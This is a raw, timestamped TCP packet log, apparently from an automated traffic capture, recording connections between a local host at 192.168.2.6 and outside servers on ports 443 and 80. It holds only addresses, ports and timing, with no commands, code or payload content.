                                                                                                                                                      Oct 3, 2024 09:16:31.960951090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.960973024 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.961054087 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.961077929 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.963488102 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.973463058 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.973481894 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.973572969 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.973597050 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.975502968 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.992405891 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.992436886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.992563963 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.992588043 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.993591070 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.006504059 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.006526947 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.006877899 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.006906033 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.007246017 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.010108948 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.010127068 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.010282040 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.010296106 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.010346889 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.024523973 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.024544001 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.024715900 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.024728060 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.024983883 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.037084103 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.037110090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.408680916 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.409642935 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.418373108 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.418448925 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.418518066 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.418530941 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.418559074 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.418570995 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.432562113 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.432610035 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.432765007 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.432782888 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.432832956 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.459337950 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.459412098 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.459489107 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.459530115 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.459543943 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.459572077 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.463116884 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.463169098 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.463223934 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.463233948 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.463258982 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.463275909 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.468700886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.468751907 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.468806028 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.468815088 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.468839884 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.468862057 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.479692936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.479716063 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.479938984 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.479973078 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.480031967 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.498740911 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.498795033 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.498892069 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.498903990 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.498924971 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.498961926 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.508407116 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.508465052 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.508555889 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.508584976 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.508611917 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.508622885 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.509624004 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.509673119 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.509852886 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.509866953 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.509913921 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.523245096 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.523293018 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.523418903 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.523453951 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.523503065 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.549721956 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.549776077 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.549922943 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.549969912 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.549993992 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.550014019 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.558691025 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.558743954 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.558832884 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.558870077 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.558885098 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.558911085 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.559920073 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.559961081 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.559994936 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.560009003 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.560036898 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.560054064 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.570640087 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.570697069 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.570763111 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.570796013 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.570815086 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.570837975 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.589001894 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.589067936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.589296103 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.589346886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.589399099 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.599133968 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.599194050 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.599297047 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.599335909 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.599354982 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.599378109 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.600372076 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.600392103 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.600466013 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.600486040 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.600528002 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.613928080 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.613995075 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.614084005 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.614123106 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.614140987 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.614165068 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.640409946 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.640436888 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.640542984 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.640571117 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.640614986 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.649483919 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.649504900 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.649621010 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.649648905 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.649692059 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.650368929 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.650387049 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.650453091 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.650464058 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.650502920 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.661489964 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.661513090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.661613941 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.661644936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.661700010 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.679554939 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.679586887 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.679831982 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.679845095 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.679899931 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.201015949 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.355319977 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.355421066 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.355467081 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.355508089 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.355892897 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.355911016 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.360500097 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.360548019 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.360622883 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.360905886 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.360915899 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.018505096 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.018641949 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.019207001 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.019215107 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.021101952 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.021120071 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.785641909 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.785737038 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.785825014 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.785841942 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.786021948 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.786039114 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.789231062 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:42.794264078 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.794380903 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:42.795058012 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:42.799916029 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416296959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416335106 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416346073 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416364908 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.416404009 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.416595936 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416608095 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416619062 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416632891 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.416660070 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.417084932 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417097092 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417108059 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417119980 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417124033 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.417160034 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.421232939 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.421292067 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.421317101 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.421358109 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506170988 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506227016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506238937 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506429911 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506429911 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506454945 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506490946 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506639004 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506652117 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506675959 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506692886 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506973028 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506985903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507025003 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507287025 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507330894 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507469893 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507483959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507514000 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507530928 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507751942 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507791996 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507947922 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507957935 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507992029 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.508548021 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508558989 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508593082 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.508631945 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508667946 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.508788109 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508799076 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508831024 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.509104013 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.509115934 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.509149075 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.596683025 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596723080 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596862078 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596873999 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596884012 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.596935987 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597203016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597214937 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597225904 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597254038 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597271919 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597661018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597671986 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597682953 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597707987 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597735882 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.598159075 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598170996 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598181963 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598192930 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598216057 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.598246098 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599036932 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599056959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599067926 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599077940 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599090099 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599117994 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599153996 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599654913 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599668980 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599711895 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599746943 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599860907 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599874020 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599903107 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599921942 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.600212097 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600224018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600234032 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600244999 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600256920 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600261927 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782064915 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782074928 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782079935 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782114029 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.782854080 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.782870054 CEST8049745147.45.44.104192.168.2.6
